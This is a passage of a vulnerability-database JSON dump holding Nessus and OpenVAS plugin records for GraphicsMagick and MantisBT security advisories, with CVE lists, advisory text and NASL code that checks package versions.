"CVE-2017-11643", "CVE-2016-5241", "CVE-2016-7447", "CVE-2017-17500", "CVE-2016-3718", "CVE-2017-13065", "CVE-2017-13134", "CVE-2016-7448", "CVE-2016-3717", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-12937", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-17912", "CVE-2016-7446", "CVE-2016-7449"], "modified": "2018-06-28T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libgraphicsmagick++3", "p-cpe:/a:debian:debian_linux:graphicsmagick", "cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3"], "id": "DEBIAN_DLA-1401.NASL", "href": "https://www.tenable.com/plugins/nessus/110727", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1401-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110727);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\", \"CVE-2016-5241\", \"CVE-2016-7446\", \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\", \"CVE-2017-11636\", \"CVE-2017-11643\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-14314\", \"CVE-2017-14733\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17912\", \"CVE-2017-17915\");\n\n script_name(english:\"Debian DLA-1401-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various security issues were discovered in Graphicsmagick, a\ncollection of image processing tools. Heap-based buffer overflows or\noverreads may lead to a denial of service or disclosure of in-memory\ninformation or other unspecified impact by processing a malformed\nimage file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.20-3+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-02-01T01:22:07", "description": "Memory information disclosure in DescribeImage function in\nmagick/describe.c\n\nGraphicsMagick is vulnerable to a memory information disclosure\nvulnerability found in the DescribeImage function of the\nmagick/describe.c file, because of a heap-based buffer over-read. The\nportion of the code containing the vulnerability is responsible for\nprinting the IPTC Profile information contained in the image. This\nvulnerability can be triggered with a specially crafted MIFF file.\nThere is an out-of-bounds buffer dereference because certain\nincrements are never checked. (CVE-2017-16353 )\n\nGraphicsMagick 1.3.26 has double free vulnerabilities in the\nReadOneJNGImage() function in coders/png.c (CVE-2017-11139)\n\nIn GraphicsMagick there is a stack-based buffer over-read in\nWriteWEBPImage in coders/webp.c, related to an incompatibility with\nlibwebp versions, 0.5.0 and later, that use a different structure\ntype. (CVE-2017-17913)\n\nIn GraphicsMagick 1.3.27, there is an infinite loop and application\nhang in the ReadBMPImage function (coders/bmp.c). Remote attackers\ncould leverage this vulnerability to cause a denial of service via an\nimage file with a crafted bit-field mask value. (CVE-2018-5685)\n\nThe ReadJPEGImage function in coders/jpeg.c in GraphicsMagick 1.3.26\ncreates a pixel cache before a successful read of a scanline, which\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted JPEG files. (CVE-2017-11140)\n\nIn GraphicsMagick 1.3.26, an allocation failure vulnerability was\nfound in the function ReadMNGImage in coders/png.c when a small MNG\nfile has a MEND chunk with a large length value. (CVE-2017-13147)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteCMYKImage()\nfunction in coders/cmyk.c when processing multiple frames that have\nnon-identical widths. (CVE-2017-11643)\n\nGraphicsMagick 1.3.26 has a Memory Leak in the PersistCache function\nin magick/pixel_cache.c during writing of Magick Persistent Cache\n(MPC) files. (CVE-2017-11641)\n\nIn GraphicsMagick there is a heap-based buffer over-read in\nReadMNGImage in coders/png.c, related to accessing one byte before\ntesting whether a limit has been reached. (CVE-2017-17915)\n\nIn GraphicsMagick 1.3.27a, there is a buffer over-read in\nReadPALMImage in coders/palm.c when QuantumDepth is 8.\n(CVE-2017-17783)\n\nIn GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in\nReadOneJNGImage in coders/png.c, related to oFFs chunk allocation.\n(CVE-2017-17782)\n\ncoders/wpg.c in GraphicsMagick 1.3.26 allows remote attackers to cause\na denial of service (heap-based buffer overflow and application crash)\nor possibly have unspecified other impact via a crafted file, related\nto the AcquireCacheNexus function in magick/pixel_cache.c.\n(CVE-2017-16669)\n\nIn GraphicsMagick there is a heap-based buffer over-read in\nReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap\ndata beyond the allocated region. (CVE-2017-17912)\n\nThe ReadOneJNGImage function in coders/png.c in GraphicsMagick 1.3.26\nallows remote attackers to cause a denial of service (application\ncrash) during JNG reading via a zero-length color_image data\nstructure. (CVE-2017-11102)\n\nGraphicsMagick 1.3.26 has a NULL pointer dereference in the\nWritePCLImage() function in coders/pcl.c during writes of monochrome\nimages. (CVE-2017-11637)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteRGBImage()\nfunction in coders/rgb.c when processing multiple frames that have\nnon-identical widths. (CVE-2017-11636)", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-09T00:00:00", "title": "Amazon Linux AMI : GraphicsMagick (ALAS-2018-966)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17783", "CVE-2017-17915", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13147", "CVE-2017-11636", "CVE-2017-17782", "CVE-2017-11102", "CVE-2017-11643", "CVE-2017-11139", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-11140", "CVE-2018-5685", "CVE-2017-17912", "CVE-2017-11637"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:GraphicsMagick-doc", "p-cpe:/a:amazon:linux:GraphicsMagick-c++", "p-cpe:/a:amazon:linux:GraphicsMagick-perl", "p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo", "p-cpe:/a:amazon:linux:GraphicsMagick-devel", "p-cpe:/a:amazon:linux:GraphicsMagick-c++-devel", "p-cpe:/a:amazon:linux:GraphicsMagick", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-966.NASL", "href": "https://www.tenable.com/plugins/nessus/107237", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-966.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107237);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/07/10 16:04:12\");\n\n script_cve_id(\"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11641\", \"CVE-2017-11643\", \"CVE-2017-13147\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2018-5685\");\n script_xref(name:\"ALAS\", value:\"2018-966\");\n\n script_name(english:\"Amazon Linux AMI : GraphicsMagick (ALAS-2018-966)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Memory information disclosure in DescribeImage function in\nmagick/describe.c\n\nGraphicsMagick is vulnerable to a memory information disclosure\nvulnerability found in the DescribeImage function of the\nmagick/describe.c file, because of a heap-based buffer over-read. The\nportion of the code containing the vulnerability is responsible for\nprinting the IPTC Profile information contained in the image. This\nvulnerability can be triggered with a specially crafted MIFF file.\nThere is an out-of-bounds buffer dereference because certain\nincrements are never checked. (CVE-2017-16353 )\n\nGraphicsMagick 1.3.26 has double free vulnerabilities in the\nReadOneJNGImage() function in coders/png.c (CVE-2017-11139)\n\nIn GraphicsMagick there is a stack-based buffer over-read in\nWriteWEBPImage in coders/webp.c, related to an incompatibility with\nlibwebp versions, 0.5.0 and later, that use a different structure\ntype. (CVE-2017-17913)\n\nIn GraphicsMagick 1.3.27, there is an infinite loop and application\nhang in the ReadBMPImage function (coders/bmp.c). Remote attackers\ncould leverage this vulnerability to cause a denial of service via an\nimage file with a crafted bit-field mask value. (CVE-2018-5685)\n\nThe ReadJPEGImage function in coders/jpeg.c in GraphicsMagick 1.3.26\ncreates a pixel cache before a successful read of a scanline, which\nallows remote attackers to cause a denial of service (resource\nconsumption) via crafted JPEG files. (CVE-2017-11140)\n\nIn GraphicsMagick 1.3.26, an allocation failure vulnerability was\nfound in the function ReadMNGImage in coders/png.c when a small MNG\nfile has a MEND chunk with a large length value. (CVE-2017-13147)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteCMYKImage()\nfunction in coders/cmyk.c when processing multiple frames that have\nnon-identical widths. (CVE-2017-11643)\n\nGraphicsMagick 1.3.26 has a Memory Leak in the PersistCache function\nin magick/pixel_cache.c during writing of Magick Persistent Cache\n(MPC) files. (CVE-2017-11641)\n\nIn GraphicsMagick there is a heap-based buffer over-read in\nReadMNGImage in coders/png.c, related to accessing one byte before\ntesting whether a limit has been reached. (CVE-2017-17915)\n\nIn GraphicsMagick 1.3.27a, there is a buffer over-read in\nReadPALMImage in coders/palm.c when QuantumDepth is 8.\n(CVE-2017-17783)\n\nIn GraphicsMagick 1.3.27a, there is a heap-based buffer over-read in\nReadOneJNGImage in coders/png.c, related to oFFs chunk allocation.\n(CVE-2017-17782)\n\ncoders/wpg.c in GraphicsMagick 1.3.26 allows remote attackers to cause\na denial of service (heap-based buffer overflow and application crash)\nor possibly have unspecified other impact via a crafted file, related\nto the AcquireCacheNexus function in magick/pixel_cache.c.\n(CVE-2017-16669)\n\nIn GraphicsMagick there is a heap-based buffer over-read in\nReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap\ndata beyond the allocated region. (CVE-2017-17912)\n\nThe ReadOneJNGImage function in coders/png.c in GraphicsMagick 1.3.26\nallows remote attackers to cause a denial of service (application\ncrash) during JNG reading via a zero-length color_image data\nstructure. (CVE-2017-11102)\n\nGraphicsMagick 1.3.26 has a NULL pointer dereference in the\nWritePCLImage() function in coders/pcl.c during writes of monochrome\nimages. (CVE-2017-11637)\n\nGraphicsMagick 1.3.26 has a heap overflow in the WriteRGBImage()\nfunction in coders/rgb.c when processing multiple frames that have\nnon-identical widths. (CVE-2017-11636)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-966.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update GraphicsMagick' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-devel-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-debuginfo-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-devel-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-doc-1.3.28-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-perl-1.3.28-1.12.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-c++ / GraphicsMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-23T16:32:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17783", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-17782", "CVE-2017-17503", "CVE-2017-16547", "CVE-2017-17500", "CVE-2017-16669", "CVE-2017-16545", "CVE-2017-17501"], "description": "The remote host is missing an update for the ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562310844305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844305", "type": "openvas", "title": "Ubuntu Update for graphicsmagick USN-4248-1", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844305\");\n script_version(\"2020-01-23T07:59:05+0000\");\n script_cve_id(\"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 07:59:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 04:00:25 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Ubuntu Update for graphicsmagick USN-4248-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"4248-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-January/005283.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'graphicsmagick'\n package(s) announced via the USN-4248-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that GraphicsMagick incorrectly handled certain image files.\nAn attacker could possibly use this issue to cause a denial of service or other\nunspecified impact.\");\n\n script_tag(name:\"affected\", value:\"'graphicsmagick' package(s) on Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"-q16-12\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick-q16-3\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17783", "CVE-2018-17782"], "description": "MantisBT is prone to multiple cross-site scripting vulnerabilities.", "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "OPENVAS:1361412562310142411", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142411", "type": "openvas", "title": "MantisBT < 2.17.2 Multiple XSS Vulnerabilities - Linux", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:mantisbt:mantisbt';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142411\");\n script_version(\"2019-05-15T08:52:57+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-15 08:52:57 +0000 (Wed, 15 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-15 08:39:15 +0000 (Wed, 15 May 2019)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2018-17782\", \"CVE-2018-17783\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"MantisBT < 2.17.2 Multiple XSS Vulnerabilities - Linux\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"mantis_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"mantisbt/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"MantisBT is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MantisBT is prone to multiple cross-site scripting vulnerabilities:\n\n - XSS vulnerability in the Manage Filters page (CVE-2018-17782)\n\n - XSS vulnerability in the Edit Filter page (CVE-2018-17783)\");\n\n script_tag(name:\"affected\", value:\"MantisBT 2.1.0 through 2.17.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.17.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://mantisbt.org/blog/archives/mantisbt/613\");\n script_xref(name:\"URL\", value:\"https://mantisbt.org/bugs/view.php?id=24813\");\n script_xref(name:\"URL\", value:\"https://mantisbt.org/bugs/view.php?id=24814\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"2.1.0\", test_version2: \"2.17.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.17.2\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:32:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17783", "CVE-2018-17782"], "description": "MantisBT is prone to multiple cross-site scripting vulnerabilities.", "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "OPENVAS:1361412562310142412", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142412", "type": "openvas", "title": "MantisBT < 2.17.2 Multiple XSS Vulnerabilities - Windows", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is 